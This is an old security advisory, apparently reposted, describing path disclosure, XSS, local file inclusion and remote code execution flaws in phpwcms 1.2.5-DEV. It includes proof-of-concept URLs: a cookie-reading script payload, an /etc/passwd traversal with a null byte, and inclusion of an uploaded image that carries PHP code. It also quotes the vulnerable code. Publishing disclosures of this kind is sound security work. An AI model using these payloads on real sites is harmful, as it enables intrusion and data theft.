phpwcms multiple vulnerabilities

2006.05.24
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Vendor: http://www.phpwcms.de Bugs: Path Disclosure, XSS, Local File Inclusion, Remote Code Execution Vulnerable Version: phpwcms 1.2.5-DEV (prior versions also maybe affected) Exploitation: Remote with browser Description: -------------------- phpwcms is a web content management system optimized for fast and easy setup on any standard web server. phpwcms is perfect for professional, public and private users. Vulnerability: -------------------- -->>Path Disclosure<<-- Reason: direct access to include files that generates php error with installation path information. Several files are vulnerable in this case. Example: http://example.com/phpwcms/include/inc_lib/files.public-userroot.inc.php http://example.com/phpwcms/include/inc_lib/files.private.additions.inc.p hp -->>XSS<<-- Reason: when register globals is enable several template files are vulnerable to xss. Example: http://localhost/php/phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be _cnt_plainhtml]=<script>alert(document.cookie)</script> Code Snippet: /include/inc_tmpl/content/cnt6.inc.php //line#28 <?php echo $BL['be_cnt_plainhtml'] ?> -->>Local File Inclusion<<-- Reason: Incorrect use of spaw script (external script) and its configuration result in local file inclusion when register globals is enable and gpc_magic_quotes is Off. http://localhost/php/phpwcms/include/inc_ext/spaw/spaw_control.class.php ?spaw_root=../../../../etc/passwd%00 Code Snippet: /include/inc_ext/spaw/spaw_control.class.php //lines:#15-20 if (preg_match("/:///i", $spaw_root)) die ("can't include external file"); include $spaw_root.'config/spaw_control.config.php'; include $spaw_root.'class/util.class.php'; include $spaw_root.'class/toolbars.class.php'; include $spaw_root.'class/lang.class.php'; -->>Remote Code Execution<<-- Reason: It is possible for an attacker to upload a picture with php code as EXIF metadata content in his post and then he can uses above vulnerability to conduct remote code execution. Example: http://example.com/phpwcms/include/inc_ext/spaw/spaw_control.class.php?s paw_root=../../../picture/upload/shell.jpg%00 Solution: -------------------- Vendor has been contacted but we are not aware of any vendor supplied patch. Original Advisories: -------------------- http://www.kapda.ir/advisory-331.html IN Farsi:http://irannetjob.com/ Credit: -------------------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir] __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top